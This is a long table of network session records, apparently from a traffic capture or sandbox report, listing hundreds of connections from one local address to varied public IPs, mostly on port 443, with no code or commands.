                                                13261192.168.2.233474214.101.11.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13262192.168.2.234901423.201.247.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13263192.168.2.2351366108.144.204.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13264192.168.2.2334592125.133.216.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13265192.168.2.235868036.151.246.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13266192.168.2.234333444.142.178.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13267192.168.2.2347274185.101.90.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13268192.168.2.2348300191.33.34.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13269192.168.2.2359500141.72.146.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13270192.168.2.233332886.80.192.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13271192.168.2.2353972186.18.207.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13272192.168.2.235704085.209.90.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13273192.168.2.235308867.108.18.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13274192.168.2.2341818174.98.225.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13275192.168.2.235842082.206.226.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13276192.168.2.2340954134.122.120.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13277192.168.2.2357496184.153.230.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13278192.168.2.234518846.129.171.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13279192.168.2.2332800210.201.53.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13280192.168.2.2346344111.85.55.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13281192.168.2.2352756101.206.51.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13282192.168.2.236016667.202.136.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13283192.168.2.2349846223.221.226.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13284192.168.2.2342406183.102.202.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13285192.168.2.2345496197.6.63.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13286192.168.2.233285882.245.85.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13287192.168.2.236020266.4.61.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13288192.168.2.2334486192.126.79.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13289192.168.2.2347482189.213.236.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13290192.168.2.2353570116.169.238.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13291192.168.2.235567241.106.132.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13292192.168.2.2360960203.61.25.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13293192.168.2.233334698.36.130.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13294192.168.2.2352746142.126.93.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13295192.168.2.2359612122.89.1.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13296192.168.2.2343286112.180.225.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13297192.168.2.2360874202.252.78.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13298192.168.2.233917090.93.125.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13299192.168.2.2358726117.179.53.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13300192.168.2.233900231.191.114.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13301192.168.2.2349750143.46.250.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13302192.168.2.2345222119.73.42.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13303192.168.2.2339118132.228.68.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13304192.168.2.235002252.9.180.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13305192.168.2.2353476208.33.80.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13306192.168.2.2342726187.69.31.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13307192.168.2.2337808222.179.120.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13308192.168.2.2341614115.125.178.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13309192.168.2.234023247.39.228.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13310192.168.2.2351844218.163.217.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13311192.168.2.235275464.64.244.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13312192.168.2.2353292136.102.209.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13313192.168.2.235335484.245.46.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13314192.168.2.2340538172.247.34.518080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13315192.168.2.234196831.67.88.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13316192.168.2.233440453.223.89.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13317192.168.2.235811850.6.38.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13318192.168.2.2349950100.249.199.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13319192.168.2.235674845.20.41.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13320192.168.2.2346776125.180.58.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13321192.168.2.2335000165.83.49.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13322192.168.2.234084486.142.203.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13323192.168.2.2355436104.58.187.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13324192.168.2.235935867.145.244.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13325192.168.2.233916473.63.188.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13326192.168.2.233554092.111.0.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13327192.168.2.235702877.201.141.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13328192.168.2.2346038102.86.131.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13329192.168.2.233322070.20.31.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13330192.168.2.2360186153.179.194.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13331192.168.2.235413613.244.185.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13332192.168.2.235080068.106.196.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13333192.168.2.2360588219.14.43.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13334192.168.2.2356394196.17.175.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13335192.168.2.235664062.254.50.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13336192.168.2.2356258102.139.154.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13337192.168.2.2342510213.52.100.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13338192.168.2.234771675.218.39.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13339192.168.2.2339408182.226.64.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13340192.168.2.23586588.11.166.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13341192.168.2.234254283.160.128.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13342192.168.2.2356090157.101.20.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13343192.168.2.2346174155.184.26.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13344192.168.2.234060099.218.34.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13345192.168.2.2342914153.35.181.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13346192.168.2.233732469.143.94.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13347192.168.2.234020863.220.232.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13348192.168.2.2352476142.187.202.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13349192.168.2.2352098218.12.121.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13350192.168.2.2347106152.228.213.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13351192.168.2.2357446144.255.114.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13352192.168.2.2356008116.177.209.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13353192.168.2.235863259.209.110.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13354192.168.2.2352352133.218.205.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13355192.168.2.2350516116.251.136.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13356192.168.2.2347200139.157.243.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13357192.168.2.2359338149.86.80.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13358192.168.2.233763025.109.61.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13359192.168.2.234379084.184.240.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13360192.168.2.23559721.82.145.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13361192.168.2.2353366220.197.12.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13362192.168.2.233882659.132.81.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13363192.168.2.236087820.212.209.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13364192.168.2.234047674.58.229.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13365192.168.2.234665842.94.225.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13366192.168.2.2343766123.230.110.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13367192.168.2.235840881.119.24.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13368192.168.2.2342708203.211.163.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13369192.168.2.2350286206.3.42.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13370192.168.2.23338682.187.152.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13371192.168.2.234055235.221.20.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13372192.168.2.233964895.4.166.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13373192.168.2.2351342148.98.131.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13374192.168.2.2342922130.8.1.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13375192.168.2.2356578135.185.190.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13376192.168.2.2345004157.99.45.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13377192.168.2.2351020184.212.254.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13378192.168.2.235106012.167.86.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13379192.168.2.2355984151.127.223.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13380192.168.2.2360414192.171.110.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13381192.168.2.23518929.208.65.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13382192.168.2.2350562211.219.143.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13383192.168.2.233597043.243.205.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13384192.168.2.2342744118.98.198.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13385192.168.2.234195692.108.20.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13386192.168.2.2349396190.170.242.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13387192.168.2.233758883.168.201.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13388192.168.2.236092664.32.147.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13389192.168.2.2340526171.83.251.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13390192.168.2.235180212.149.125.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13391192.168.2.2339954199.16.174.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13392192.168.2.2336276126.46.120.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13393192.168.2.233554889.14.190.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13394192.168.2.2333176220.105.253.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13395192.168.2.2356484111.206.116.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13396192.168.2.234220282.197.218.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13397192.168.2.233469091.72.151.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13398192.168.2.2353004170.239.236.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13399192.168.2.23478362.51.55.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13400192.168.2.23583962.205.196.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13401192.168.2.2334074100.197.216.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13402192.168.2.2354946165.204.67.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13403192.168.2.2356304137.87.56.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13404192.168.2.2338890164.85.73.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13405192.168.2.235238488.191.157.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13406192.168.2.2359296110.191.113.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13407192.168.2.233978232.69.8.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13408192.168.2.2359522202.217.204.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13409192.168.2.234835613.194.192.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13410192.168.2.234027892.83.8.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13411192.168.2.234811685.96.32.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13412192.168.2.235716296.81.84.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13413192.168.2.234216669.164.33.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13414192.168.2.234067017.72.132.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13415192.168.2.2338682151.185.33.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13416192.168.2.2352684123.33.3.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13417192.168.2.23410809.204.241.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13418192.168.2.233431884.79.119.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13419192.168.2.2357720162.172.191.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13420192.168.2.23447985.41.174.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13421192.168.2.235430470.7.134.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13422192.168.2.2344324154.100.38.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13423192.168.2.2348520103.137.171.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13424192.168.2.2348140154.163.138.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13425192.168.2.2338824220.7.237.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13426192.168.2.2358724130.101.10.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13427192.168.2.233900650.214.67.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13428192.168.2.2341196221.122.67.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13429192.168.2.2340198134.117.73.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13430192.168.2.2335798151.181.175.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13431192.168.2.2344420193.8.41.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13432192.168.2.235091845.130.212.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13433192.168.2.233861613.159.160.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13434192.168.2.2334956128.209.31.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13435192.168.2.234207274.193.145.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13436192.168.2.2354302114.95.39.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13437192.168.2.23600861.104.222.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13438192.168.2.2357208167.207.102.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13439192.168.2.2337288174.54.123.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13440192.168.2.234521814.44.229.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13441192.168.2.2353696168.253.204.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13442192.168.2.2349520196.103.197.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13443192.168.2.2338726221.118.156.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13444192.168.2.2355496155.161.28.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13445192.168.2.2356952104.252.194.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13446192.168.2.2356104168.234.158.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13447192.168.2.234087663.106.244.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13448192.168.2.233461635.141.127.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13449192.168.2.2356654159.45.2.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13450192.168.2.235655853.62.107.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13451192.168.2.2356130159.190.1.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13452192.168.2.2352048190.143.123.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13453192.168.2.2352632107.247.123.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13454192.168.2.233467072.205.179.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13455192.168.2.234951296.208.153.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13456192.168.2.23490704.209.23.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13457192.168.2.2339908109.15.221.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13458192.168.2.2359546193.23.52.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13459192.168.2.2341778106.159.123.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13460192.168.2.235544899.61.11.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13461192.168.2.23496181.239.188.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13462192.168.2.2344226218.132.129.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13463192.168.2.234094217.74.194.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13464192.168.2.2347628216.27.243.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13465192.168.2.234261420.41.216.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13466192.168.2.234987679.94.3.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13467192.168.2.234390494.196.174.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13468192.168.2.2349686143.143.89.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13469192.168.2.235548486.108.205.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13470192.168.2.2334452162.240.223.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13471192.168.2.2336438208.160.180.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13472192.168.2.2347102106.39.98.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13473192.168.2.2342368153.136.10.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13474192.168.2.2339492144.42.240.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13475192.168.2.235929084.234.61.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13476192.168.2.2351382125.138.232.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13477192.168.2.2335192110.60.143.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13478192.168.2.2341640159.112.180.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13479192.168.2.235022825.188.121.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13480192.168.2.2335040190.26.234.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13481192.168.2.234918039.187.138.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13482192.168.2.235676243.242.131.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
